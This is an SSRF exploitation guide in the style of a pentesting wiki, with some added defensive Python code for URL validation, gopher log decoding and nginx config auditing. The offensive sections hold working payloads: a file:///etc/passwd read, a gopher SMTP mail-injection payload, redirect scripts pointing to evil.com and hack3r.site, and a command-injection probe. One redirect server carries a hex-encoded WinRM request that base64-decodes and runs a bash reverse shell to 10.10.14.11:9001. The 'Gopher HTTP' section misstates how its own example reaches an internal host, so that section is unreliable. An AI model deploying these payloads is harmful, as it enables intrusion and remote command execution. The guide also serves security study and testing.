
SSRF (Server Side Request Forgery)



Basic Information

A Server-Side Request Forgery (SSRF) vulnerability occurs when an attacker tricks a server-side application into making an HTTP request to a domain of the attacker's choosing. The vulnerability exposes the server to attacker-directed outbound requests.

Capturing SSRF

The first thing you need to do is capture an SSRF interaction that you generated. You can use tools such as:

Bypassing Domain Whitelists

Usually you will find that the SSRF only works against a few whitelisted domains or URLs. The following page collects techniques for trying to bypass that whitelist:

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Bypass via open redirect

If the server is well protected, you may still be able to bypass all its restrictions by abusing an open redirect inside the web page. Because the page allows SSRF to its own domain and will probably follow redirects, you can use the open redirect to make the server reach internal resources.
Read more here: https://portswigger.net/web-security/ssrf
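As an added, defender-side example (not code from HackTricks or from any library it mentions), the following Python validator shows what a server-side fetcher has to do to withstand the whitelist bypasses and the open-redirect trick described above: only http/https are accepted, userinfo is refused, the host is resolved and every returned address is rejected unless it is globally routable (so 127.0.0.1, 10/8, 169.254.169.254 and IPv4-mapped IPv6 forms are all refused), redirects are followed by hand with every hop re-validated, and the checked IP is handed back so the caller connects to exactly that address rather than re-resolving. The `resolver` and `head` callbacks are injectable so the logic can be exercised offline; the hostnames used in the assumptions are constructed.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

# Only plain web schemes; gopher://, dict://, file://, ldap:// etc. are refused outright.
ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 5


def resolve_host(host):
    """Resolve a hostname to the set of IP strings it currently points at (real DNS lookup)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_ip(ip):
    """True only for globally routable unicast addresses: no loopback, RFC 1918, link-local
    (including the 169.254.169.254 metadata address), multicast or reserved ranges."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 is still loopback
    return ip.is_global and not ip.is_multicast


def check_url(url, resolver=resolve_host):
    """Return (pinned_ip, None) if the URL may be fetched server-side, else (None, reason).

    The returned IP is the one the caller should connect to, so a DNS answer that changes
    between validation and connection (rebinding) cannot redirect the fetch."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return None, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return None, "userinfo in URL not allowed"
    host = parts.hostname
    if not host:
        return None, "missing host"
    try:
        addrs = {str(ipaddress.ip_address(host))}   # literal IP: no DNS involved
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return None, f"cannot resolve {host!r}"
    if not addrs:
        return None, f"{host!r} has no addresses"
    # Every address must be public: a name that resolves to one public and one internal
    # address is refused, otherwise the fetch depends on which answer the stack picks.
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%", 1)[0])   # drop an IPv6 zone id
        if not is_public_ip(ip):
            return None, f"{host!r} resolves to non-public address {ip}"
    return sorted(addrs)[0], None


def resolve_final_url(url, head, resolver=resolve_host):
    """Follow redirects manually, re-validating every hop, so an open redirect on an
    allowed host cannot steer the request to an internal address.

    `head(url)` is injected (assumption): it performs one request without following
    redirects and returns (status_code, location_header_or_None)."""
    current = url
    for _ in range(MAX_REDIRECTS + 1):
        pinned, reason = check_url(current, resolver)
        if reason:
            return None, f"refused {current}: {reason}"
        status, location = head(current)
        if status in (301, 302, 303, 307, 308) and location:
            current = urljoin(current, location)   # relative Location headers are fine
            continue
        return current, None
    return None, "too many redirects"
```

In a real fetcher the pinned IP is passed to the HTTP client (connect to the IP, keep the original Host/SNI), and the redirect loop above replaces the client's automatic redirect following, which is exactly the feature the open-redirect bypass relies on.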

Protocols

  • file://
    The file:// URL scheme is referenced, pointing directly to /etc/passwd: file:///etc/passwd

  • dict://
    The DICT URL scheme is described as being used to obtain definitions or word lists through the DICT protocol. The example given shows a URL crafted to target a specific word, database and entry number, together with a PHP script that could be abused to connect to a DICT server with attacker-supplied credentials: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>

  • SFTP://
    Identified as a protocol for secure file transfer over Secure Shell; an example shows how a PHP script could be abused to connect to a malicious SFTP server: url=sftp://generic.com:11111/

  • TFTP://
    Trivial File Transfer Protocol, which works over UDP, is mentioned with an example of a PHP script designed to send a request to a TFTP server. A TFTP request is made to 'generic.com' on port '12346' for the file 'TESTUDPPACKET': ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET

  • LDAP://
    This section covers the Lightweight Directory Access Protocol, emphasising its use for managing and accessing distributed directory information services over IP networks. Interact with an LDAP server on localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.

  • SMTP
    A method is described for using an SSRF vulnerability to interact with SMTP services on localhost, including steps to disclose internal domain names and further investigative steps based on that information.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220 http://blabla.internaldomain.com ESMTP Sendmail
3. search http://internaldomain.com on github, find subdomains
4. connect
  • Curl URL globbing - WAF bypass
    If the SSRF is executed by curl, curl has a feature called URL globbing that can be useful for bypassing WAFs. For example, in this writeup you can find this example of path traversal through the file protocol:
    file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

  • Gopher://
    The ability of the Gopher protocol to specify the IP, port and bytes for the server communication is discussed, together with tools such as Gopherus and remote-method-guesser for creating payloads. Two distinct uses are described:

Gopher://

Using this protocol you can specify the IP, port and bytes you want the server to send. Then, you can basically use the SSRF to communicate with any TCP server (but you need to know how to talk to the service first).
Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.

Gopher smtp

```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
```

will make a request like

```
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: AH AH AH

You didn't say the magic word !


.
QUIT
```

Gopher HTTP

Gopher is a protocol that allows the retrieval of documents over the Internet. It was popular in the early days of the web but has since been largely replaced by HTTP. However, some legacy systems still support Gopher.

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests on behalf of the vulnerable server. One way to exploit SSRF is by using the Gopher protocol to bypass restrictions and access internal resources.

To perform a Gopher SSRF attack, follow these steps:

  1. Identify the SSRF vulnerability in the target application.
  2. Craft a Gopher URL that points to the desired internal resource. The Gopher URL should include the IP address or hostname of the target server, along with the port and path of the resource.
  3. Submit the Gopher URL as part of the SSRF attack. The vulnerable server will make a request to the specified internal resource, and the response will be returned to the attacker.

Here is an example of a Gopher SSRF attack:

gopher://attacker.com:80/_GET%20/index.html%20HTTP/1.1%0D%0AHost:%20internal-server.com%0D%0A%0D%0A

In this example, the attacker's server is attacker.com, and the target internal resource is index.html on internal-server.com. The Gopher URL is crafted to make a GET request to the internal resource.

By exploiting SSRF using the Gopher protocol, an attacker can bypass network restrictions and access internal resources that should not be publicly accessible. This can lead to unauthorized access, data leakage, and other security risks.

To prevent Gopher SSRF attacks, it is important to properly validate and sanitize user input, especially when making requests to external resources. Additionally, network configurations should be carefully reviewed to ensure that internal resources are not exposed to the public internet.

```
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```
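Added example (not from the page or from any tool it names): the gopher URLs in the two sections above are worth being able to decode on the defending side, for instance when they show up as `url=` values in access logs during an investigation. This Python script reverses the encoding shown above (item-type character dropped, selector percent-decoded once per decoding layer, CRLF appended as curl does) and triages a handful of log values, naming the host, port and first protocol line a gopher payload would have delivered. The sample values are constructed; the gopher one is the page's SMTP payload truncated after the DATA command, and the two-pass decoding models a PHP wrapper decoding the parameter once before the gopher client decodes the URL again.

```python
from urllib.parse import unquote, urlparse

# URL schemes that turn a server-side fetch into something other than a web request:
# raw TCP (gopher), dictionary/LDAP/TFTP/SFTP services or local files. A normal
# "fetch this URL" feature has no business seeing any of them in user input.
DANGEROUS_SCHEMES = {"gopher", "dict", "file", "ldap", "tftp", "sftp"}

# Constructed sample values of a `url=` parameter as they would appear, still
# percent-encoded, in a web server access log. The gopher one is the SMTP payload
# from this page, truncated after DATA.
SAMPLE_URL_PARAMS = [
    "https://example.com/page?id=1",
    "file:///etc/passwd",
    "dict://127.0.0.1:11211/stats",
    "gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E"
    "%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250a",
]


def decode_gopher(url, decode_passes=1):
    """Return (host, port, bytes) for a gopher:// URL: the bytes a gopher client such as
    curl writes to host:port. The first path character is the gopher item type and is not
    sent; the rest is the selector, percent-decoded and followed by CRLF.
    decode_passes=2 models a wrapper (e.g. PHP reading $_GET['url']) that decodes the
    parameter once before the gopher client decodes the URL again, which is why the page's
    SMTP example writes %250d%250a for CRLF."""
    parts = urlparse(url)          # used only for host/port; the path is split by hand
    if parts.scheme.lower() != "gopher":
        raise ValueError("not a gopher URL")
    pieces = url.split("/", 3)
    selector = pieces[3][1:] if len(pieces) == 4 and pieces[3] else ""
    for _ in range(decode_passes):
        selector = unquote(selector)
    return parts.hostname, parts.port or 70, selector.encode("latin-1", "replace") + b"\r\n"


def classify_url_param(raw_value):
    """Classify one raw (log-encoded) url= value.

    The value is decoded once, as the web framework would, before the scheme is examined;
    for gopher the decoded target and the first payload line are included so an analyst
    can see which internal service the request would have spoken to."""
    value = unquote(raw_value)
    scheme = urlparse(value).scheme.lower()
    result = {"scheme": scheme, "dangerous": scheme in DANGEROUS_SCHEMES}
    if scheme == "gopher":
        host, port, payload = decode_gopher(value)
        result["target"] = f"{host}:{port}"
        result["first_line"] = payload.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    return result


def triage(raw_values):
    """Return [(raw_value, classification)] for every value that uses a dangerous scheme."""
    flagged = []
    for raw in raw_values:
        info = classify_url_param(raw)
        if info["dangerous"]:
            flagged.append((raw, info))
    return flagged


if __name__ == "__main__":
    for raw, info in triage(SAMPLE_URL_PARAMS):
        print(info, "<-", raw[:60])
```

The decoder is also a quick way to confirm what a payload seen in the wild actually says before deciding which internal service owner to notify.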

Gopher SMTP - Redirect to 1337

{% code title="redirect.php" %}
```php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
```
{% endcode %}

Now query it:

```
https://example.com/?q=http://evil.com/redirect.php
```

SSRF via Referrer header & Others

Analytics software on servers often logs the Referrer header to track incoming links, a practice that inadvertently exposes the application to Server-Side Request Forgery (SSRF). This is because such software may visit the external URLs mentioned in the Referrer header to analyse the content of the referring site. To discover these vulnerabilities, the Burp Suite plugin "Collaborator Everywhere" is recommended, as it leverages the way analytics tools process the Referer header to identify potential SSRF attack surfaces.

SSRF via SNI data from certificate

A misconfiguration that could enable a connection to any backend through a simple setup is illustrated by this Nginx configuration example:

```
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
```

In this configuration, the value from the Server Name Indication (SNI) field is used directly as the backend address. This setup exposes an SSRF vulnerability, which can be exploited simply by specifying the desired IP address or domain name in the SNI field. An example of manipulating the connection towards an arbitrary backend, such as internal.host.com, using the openssl command is given below:

```bash
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
```
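As an added example (not from the page or from nginx), here is a small Python audit that flags the pattern above in a stream configuration and accepts the usual fix, where the SNI value only selects among allow-listed upstreams through a `map` whose `default` is empty (an empty proxy_pass target makes nginx drop the connection rather than forward it). The hardened configuration, the "leaky default" variant that falls back to passthrough, and the hostnames and addresses in them are constructed for the example; the parser is deliberately approximate, a regex over the few directives this check cares about rather than a full nginx grammar.

```python
import re

# Sample 1: the SNI passthrough configuration shown on the page (weak).
WEAK_STREAM_CONF = """
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
"""

# Sample 2 (constructed, assumption): SNI only selects among allow-listed
# upstreams; anything else maps to an empty upstream and the connection is dropped.
HARDENED_STREAM_CONF = """
stream {
    map $ssl_preread_server_name $backend {
        app.example.com   10.0.0.10:443;
        api.example.com   10.0.0.11:443;
        default           "";
    }
    server {
        listen 443;
        proxy_pass $backend;
        ssl_preread on;
    }
}
"""

# Sample 3 (constructed): looks hardened, but the default re-introduces the passthrough.
LEAKY_DEFAULT_CONF = """
stream {
    map $ssl_preread_server_name $backend {
        app.example.com   10.0.0.10:443;
        default           $ssl_preread_server_name:443;
    }
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $backend;
        ssl_preread on;
    }
}
"""

SNI_VAR = "$ssl_preread_server_name"
PROXY_PASS_RE = re.compile(r"proxy_pass\s+([^;]+);")
MAP_RE = re.compile(r"map\s+(\$\w+)\s+(\$\w+)\s*\{(.*?)\}", re.S)
DEFAULT_RE = re.compile(r"^\s*default\s+([^;]+);", re.M)


def audit_sni_passthrough(conf):
    """Return a list of findings for proxy_pass targets derived from client-controlled SNI."""
    findings = []
    # Variables produced by a map over the SNI name, and whether the map's default is
    # the empty string (i.e. unknown names get no upstream at all).
    sni_maps = {}
    for src, dst, body in MAP_RE.findall(conf):
        if src == SNI_VAR:
            m = DEFAULT_RE.search(body)
            default = m.group(1).strip().strip('"\'') if m else None
            sni_maps[dst] = default == ""
    for target in PROXY_PASS_RE.findall(conf):
        target = target.strip()
        if SNI_VAR in target:
            findings.append(f"proxy_pass {target}: SNI used directly as upstream address")
            continue
        for var, safe_default in sni_maps.items():
            if var in target and not safe_default:
                findings.append(f"proxy_pass {target}: map over SNI lacks an empty default")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_STREAM_CONF), ("hardened", HARDENED_STREAM_CONF),
                       ("leaky", LEAKY_DEFAULT_CONF)):
        print(name, audit_sni_passthrough(conf) or "OK")
```

The check is cheap to run over a configuration repository in CI; the point it enforces is that the client may choose among upstreams the operator listed, never name one.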

Upload files using Wget

SSRF with Command Injection

It may be worth trying a payload like: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDF Rendering

If the web page automatically creates a PDF from information you supplied, you can insert JS that will be executed by the PDF generator itself (the server) while it builds the PDF, and you will be able to abuse an SSRF. Find more information here.

From SSRF to DoS

Create several sessions and try to download heavy files through the SSRF from those sessions.

SSRF PHP Functions

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

SSRF Redirect to Gopher

For some exploitations you may need to send a redirect response (probably in order to use a different protocol, such as gopher). Here you have different python scripts that respond with a redirect:

```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        self.send_response(301)

        self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
        self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile="server.pem")
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```

```python
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```



DNS Rebinding CORS/SOP bypass

If you are having problems exfiltrating content from a local IP because of CORS/SOP, DNS Rebinding can be used to bypass that limitation:

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

Automated DNS Rebinding

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the necessary components to rebind the IP address of the attack server's DNS name to the target machine's IP address and to serve attack payloads that exploit vulnerable software on the target machine.

Check out also the publicly running server at http://rebind.it/singularity.html

DNS Rebinding + TLS Session ID/Session ticket

Requirements:

  • SSRF
  • Outbound TLS sessions
  • Services on local ports

Attack:

  1. Ask the user/bot to access a domain controlled by the attacker
  2. The TTL of the DNS record is 0 seconds (so the victim will look up the IP of the domain again soon)
  3. A TLS connection is created between the victim and the attacker's domain. The attacker injects the payload inside the Session ID or Session Ticket.
  4. The domain starts an infinite loop of redirects to itself. The goal is to make the user/bot keep accessing the domain until it performs another DNS request for it.
  5. In that DNS request a private IP address is now returned (for example 127.0.0.1)
  6. The user/bot will try to re-establish the TLS connection and, in order to do so, will send the Session ID/Session Ticket (which contains the attacker's payload). Congratulations, you managed to make the user/bot attack itself.

Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).
To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

The difference between a blind SSRF and a non-blind one is that in the blind case you cannot see the response to the SSRF request. It is therefore harder to exploit, because you will only be able to exploit well-known vulnerabilities.

Time based SSRF

By measuring the response time of the server it may be possible to tell whether a resource exists or not (it may take longer to reach a live resource than one that does not exist).

Cloud SSRF Exploitation

If you find an SSRF vulnerability in a machine running inside a cloud environment, you may be able to obtain interesting information about the cloud environment and even credentials:

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}

SSRF Vulnerable Platforms

Several well-known platforms contain or have contained SSRF vulnerabilities; check them in:

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}

Tools

SSRFMap

Tool to detect and exploit SSRF vulnerabilities

Gopherus

This tool generates Gopher payloads for:

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

remote-method-guesser is a Java RMI vulnerability scanner that supports attack operations for most common Java RMI vulnerabilities. Most of the available operations support the --ssrf option, which generates an SSRF payload for the requested operation. Together with the --gopher option, ready-to-use gopher payloads can be generated directly.

SSRF Proxy

SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).

To practice

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

References